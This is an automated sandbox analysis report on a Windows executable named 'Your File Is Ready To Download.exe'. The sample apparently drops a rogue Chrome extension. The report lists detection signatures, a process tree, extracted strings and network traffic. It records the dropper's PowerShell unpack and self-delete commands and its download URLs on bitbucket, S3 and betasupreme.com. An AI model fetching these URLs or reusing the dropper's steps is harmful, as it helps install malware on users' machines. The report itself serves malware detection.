Play interactive tour

Edit tour

Windows Analysis Report Your File Is Ready To Download.exe

Overview

General Information

Sample Name:	Your File Is Ready To Download.exe
Analysis ID:	535019
MD5:	b864cefdeac3d2c58de4d14bab8265f1
SHA1:	a9e0a49eb09498a97a9b55bf01952e3050b5f777
SHA256:	7489f7e92e2ece51c3a05fc381efe352210d16f02326e280ffd4c52821987fa0
Infos:
Most interesting Screenshot:

Detection

Score:	51
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Self deletion via cmd delete

Sample or dropped binary is a compiled AutoHotkey binary

Contains functionality to detect sleep reduction / modifications

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

PE file contains sections with non-standard names

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to communicate with device drivers

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to read the clipboard data

Creates processes with suspicious names

Contains functionality to record screenshots

Uses the system / local time for branch decision (may execute only at specific dates)

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

OS version to string mapping found (often used in BOTs)

PE file contains strange resources

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Queries keyboard layouts

Contains functionality to retrieve information about pressed keystrokes

Found large amount of non-executed APIs

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Contains functionality to simulate mouse events

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

Your File Is Ready To Download.exe (PID: 752 cmdline: "C:\Users\user\Desktop\Your File Is Ready To Download.exe" MD5: B864CEFDEAC3D2C58DE4D14BAB8265F1)

powershell.exe (PID: 160 cmdline: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome' MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chrome.exe (PID: 7040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized MD5: C139654B5C1438A95B321BB01AD63EF6)

chrome.exe (PID: 6960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9168717871619031808,7731561381671023239,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)

cmd.exe (PID: 1504 cmdline: C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome', CommandLine: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Your File Is Ready To Download.exe" , ParentImage: C:\Users\user\Desktop\Your File Is Ready To Download.exe, ParentProcessId: 752, ProcessCommandLine: PowerShell.exe -Command Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\chromeext.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\Chrome', ProcessId: 160

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132833201138172459.160.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Your File Is Ready To Download.exe

Virustotal: Detection: 19%

Perma Link

Antivirus / Scanner detection for submitted sample

Show sources

Source: Your File Is Ready To Download.exe

Avira: detected

Source: 1.0.Your File Is Ready To Download.exe.140000000.0.unpack

Avira: Label: TR/Agent.pwc

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.81.204:443 -> 192.168.2.3:49712 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Source: Your File Is Ready To Download.exe

Static PE information: certificate valid

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400ACC40 FindFirstFileW,FindClose,FindFirstFileW,FindClose,	1_2_00000001400ACC40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014003C320 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,	1_2_000000014003C320
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400667A0 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	1_2_00000001400667A0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140080A40 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,wcsncpy,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,MoveFileW,DeleteFileW,MoveFileW,GetLastError,CopyFileW,GetLastError,	1_2_0000000140080A40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140066AE0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,malloc,	1_2_0000000140066AE0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400ACB40 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00000001400ACB40
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140081030 GetFileAttributesW,FindFirstFileW,FindClose,	1_2_0000000140081030
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140067130 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,	1_2_0000000140067130

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: Your File Is Ready To Download.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSAExtendedValidationCodeSigningCA.crl0
Source: Your File Is Ready To Download.exe, 00000001.00000003.286269221.0000000000170000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284765053.0000000000176000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369359743.000000000016B000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368941847.000000000016B000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.329995984.0000026935E94000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: powershell.exe, 00000008.00000002.329713012.000002692DFFB000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.318543310.000002691E172000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.317826184.000002691DDE1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.318543310.000002691E172000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: http://tools.ietf.org/html/rfc1950
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Your File Is Ready To Download.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
Source: manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://accounts.google.com
Source: manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://apis.google.com
Source: mirroring_common.js.11.dr	String found in binary or memory: https://apis.google.com/js/client.js
Source: Your File Is Ready To Download.exe	String found in binary or memory: https://autohotkey.com
Source: Your File Is Ready To Download.exe	String found in binary or memory: https://autohotkey.comCould
Source: Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368975906.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284791057.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369414423.00000000001A6000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: Your File Is Ready To Download.exe, 00000001.00000003.284765053.0000000000176000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369359743.000000000016B000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368941847.000000000016B000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284754452.0000000000168000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-
Source: Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368975906.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000002.369414423.00000000001A6000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/J
Source: powershell.exe, 00000008.00000002.319890273.000002691E9C7000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319883093.000002691E9B3000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319837164.000002691E980000.00000004.00000001.sdmp	String found in binary or memory: https://betasupreme.com
Source: powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmp	String found in binary or memory: https://betasupreme.com/i/?checksafe=
Source: powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmp	String found in binary or memory: https://betasupreme.com/i/?nx=
Source: powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmp	String found in binary or memory: https://betasupreme.com/thankyou/
Source: powershell.exe, 00000008.00000002.319612768.000002691E865000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319462059.000002691E732000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319598583.000002691E851000.00000004.00000001.sdmp	String found in binary or memory: https://betasupreme.com/uninstalled/
Source: Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/
Source: Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/Hl
Source: Your File Is Ready To Download.exe	String found in binary or memory: https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zip
Source: Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipBs
Source: Your File Is Ready To Download.exe, 00000001.00000002.369250966.00000000000F3000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.368850888.00000000000F3000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipKs
Source: Your File Is Ready To Download.exe, 00000001.00000003.286300148.00000000001A6000.00000004.00000001.sdmp, Your File Is Ready To Download.exe, 00000001.00000003.284791057.00000000001A6000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/betadevmode/devmode/downloads/block-floc.zipR
Source: mirroring_common.js.11.dr	String found in binary or memory: https://castedumessaging-pa.googleapis.com/v1
Source: pnacl_public_x86_64_libpnacl_irt_shim_a.11.dr, pnacl_public_x86_64_ld_nexe.11.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_a.11.dr, pnacl_public_x86_64_ld_nexe.11.dr	String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://clients2.google.com
Source: mirroring_hangouts.js.11.dr, mirroring_cast_streaming.js.11.dr	String found in binary or memory: https://clients2.google.com/cr/report
Source: powershell.exe, 00000008.00000002.319890273.000002691E9C7000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.319883093.000002691E9B3000.00000004.00000001.sdmp, manifest.json.11.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://clients6.google.com
Source: pnacl_public_x86_64_ld_nexe.11.dr	String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.11.dr	String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: manifest.json.11.dr	String found in binary or memory: https://content.googleapis.com
Source: powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: common.js.11.dr, mirroring_cast_streaming.js.11.dr	String found in binary or memory: https://crash.corp.google.com/samples?reportid=&q=
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/.
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d4275cfd-ccb1-4009-b9d1-09d7468f2cf1.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://dns.google
Source: mirroring_common.js.11.dr	String found in binary or memory: https://docs.google.com
Source: manifest.json.11.dr	String found in binary or memory: https://feedback.googleusercontent.com
Source: d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://fonts.googleapis.com
Source: manifest.json.11.dr	String found in binary or memory: https://fonts.googleapis.com;
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://fonts.gstatic.com
Source: manifest.json.11.dr	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000008.00000002.318116285.000002691DFF0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
Source: powershell.exe, 00000008.00000002.327714782.000002691F54B000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.296712834.000002691FB60000.00000004.00000001.sdmp, powershell.exe, 00000008.00000003.296556667.000002691FA63000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://hangouts.clients6.google.com
Source: manifest.json.11.dr	String found in binary or memory: https://hangouts.google.com/
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://hangouts.google.com/hangouts/_/logpref
Source: mirroring_common.js.11.dr	String found in binary or memory: https://meet.google.com
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://meetings.clients6.google.com
Source: mirroring_common.js.11.dr	String found in binary or memory: https://networktraversal.googleapis.com/v1alpha
Source: powershell.exe, 00000008.00000002.329343916.000002692DE46000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://ogs.google.com
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://play.google.com
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://preprod-hangouts-googleapis.sandbox.google.com
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr	String found in binary or memory: https://r4---sn-4g5edns6.gvt1.com
Source: data_1.12.dr	String found in binary or memory: https://r4---sn-4g5edns6.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic?cms_redirect=yes&mh=I2&mip=84.17
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr	String found in binary or memory: https://redirector.gvt1.com
Source: data_1.12.dr	String found in binary or memory: https://redirector.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic
Source: Your File Is Ready To Download.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: Your File Is Ready To Download.exe	String found in binary or memory: https://secure.comodo.com/CPS0L
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://ssl.gstatic.com
Source: messages.json87.11.dr, messages.json18.11.dr, messages.json70.11.dr, messages.json47.11.dr, messages.json37.11.dr, messages.json16.11.dr, messages.json31.11.dr, messages.json22.11.dr, messages.json1.11.dr, feedback.html.11.dr, messages.json13.11.dr, messages.json86.11.dr, messages.json82.11.dr, messages.json69.11.dr, messages.json8.11.dr	String found in binary or memory: https://support.google.com/chromecast/answer/2998456
Source: messages.json87.11.dr, messages.json18.11.dr, messages.json70.11.dr, messages.json47.11.dr, messages.json37.11.dr, messages.json16.11.dr, messages.json31.11.dr, messages.json22.11.dr, messages.json1.11.dr, feedback.html.11.dr, messages.json13.11.dr, messages.json86.11.dr, messages.json82.11.dr, messages.json69.11.dr, messages.json8.11.dr	String found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
Source: Your File Is Ready To Download.exe	String found in binary or memory: https://www.digicert.com/CPS0
Source: manifest.json.11.dr, c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://www.google.com
Source: data_1.12.dr	String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: data_1.12.dr	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: mirroring_hangouts.js.11.dr	String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: manifest.json.11.dr	String found in binary or memory: https://www.google.com;
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://www.googleapis.com
Source: manifest.json.11.dr	String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: manifest.json.11.dr	String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: manifest.json.11.dr	String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: manifest.json.11.dr	String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: manifest.json.11.dr	String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: manifest.json.11.dr	String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: manifest.json.11.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: manifest.json.11.dr	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: mirroring_common.js.11.dr	String found in binary or memory: https://www.googleapis.com/calendar/v3
Source: mirroring_common.js.11.dr	String found in binary or memory: https://www.googleapis.com/hangouts/v1
Source: c0ca93c8-b969-4ca1-a409-af5f66935290.tmp.12.dr, d79ff584-f405-453e-ba88-df68519d04c2.tmp.12.dr	String found in binary or memory: https://www.gstatic.com
Source: common.js.11.dr	String found in binary or memory: https://www.gstatic.com/hangouts_echo_detector/release/%
Source: manifest.json.11.dr	String found in binary or memory: https://www.gstatic.com;

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: bitbucket.org

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_000000014007D8A0 _wcstoi64,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,GetTickCount,PeekMessageW,GetTickCount,InternetReadFile,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,InternetCloseHandle,fclose,DeleteFileW,

1_2_000000014007D8A0

Source: global traffic	HTTP traffic detected: GET /betadevmode/devmode/downloads/block-floc.zip HTTP/1.1User-Agent: AutoHotkeyHost: bitbucket.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /6ba4c15f-1d12-46cc-bdb7-164bb91831c3/downloads/c0187cad-0ad4-4a66-96dc-87848f4069e6/block-floc.zip?Signature=yNzbjFoBEb%2FlfvIrh1KoR48D0Kg%3D&Expires=1638815130&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=X.8ahGtam4Jkxg_sHKIwuqt9FSQEDbfR&response-content-disposition=attachment%3B%20filename%3D%22block-floc.zip%22 HTTP/1.1User-Agent: AutoHotkeyCache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:1 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
